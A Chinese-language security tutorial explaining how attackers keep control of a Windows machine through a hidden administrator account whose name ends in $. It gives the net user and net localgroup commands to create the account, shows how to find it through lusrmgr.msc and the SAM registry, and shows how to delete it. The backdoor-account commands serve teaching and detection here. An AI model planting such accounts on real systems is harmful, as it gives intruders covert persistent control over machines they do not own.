「作者简介」：冬奥会网络安全中国代表队，CSDN Top100，就职奇安信多年，以实战工作为基础著作 《网络安全自学教程》，适合基础薄弱的同学系统化的学习网络安全，用最短的时间掌握最核心的技术。

Windows系统的普通用户比管理员用户少很多「权限」，比如无法更改系统设置、安装软件、访问所有文件、更改其他用户账户等。

因此，黑客在拿到机器权限后，通常会创建一个「隐藏」的具有「管理员权限」的后门账户，实现长期控制。

1、什么是隐藏账户？

「隐藏账户」的用户名以$结尾，比如 tom$。

命令行无法看到隐藏账户，但可以正常登录，具有隐蔽性。

2、查看隐藏账户

1）win + r 输入 lusrmgr.msc 打开本地用户和组，可以看到隐藏账户。

2）win + r 输入 regedit 打开注册表，找到 KLM\SAM\SAM\Domains\Account\Users\Names\

默认没有权限查看SAM注册表

右键权限，给administrators添加权限。

重新打开注册表，可以看到隐藏账户。

3、实战演示

net user tom tom.qwertyuiop /add 创建一个普通账户。

注销，使用用户tom登录。

3.1、普通用户的权限问题

whoami  			# 查看当前登录用户
net user tom		# 查看用户tom的信息
net user test /add	# 创建一个用户

现在用户在Users组，创建用户提示拒绝访问，也就是没有权限。

右键管理员身份启动cmd，还要输入administrator的密码，后面如果冤大头把密码改了，我们就无法控制。

net user 能看到创建的用户，有点基础就能发现，隐秘性不好。

注销，登录administrator。

3.2、创建隐藏账户

net user tom01$ 123.qwertyuiop /add # 创建隐藏账户
net user							# 查看所有账户

命令行看不到，具有隐蔽性。

3.3、添加到administrators组

net localgroup administrators tom01$ /add # 添加用户到administrators组
net user tom01$							  # 查看用户信息

注销，登录tom01$账户。

3.4、验证权限

右键以管理员身份打开cmd，不再需要输入administrator的密码。

whoami				# 当前登录账户
net user tom /del	# 删除（开头创建的）账户
net user			# 查看所有账户

可以更改其他账户，确认拥有管理员权限。

到这里，我们成功创建了管理员权限账户，并且实现了隐蔽性。

注销，登录administrator。

4、清理隐藏账户

net user tom01$ /del 删除隐藏账户

本地用户和组、SAM注册表里已经不见了。

注销，再登录，已经无法登录，确认隐藏账户已清除。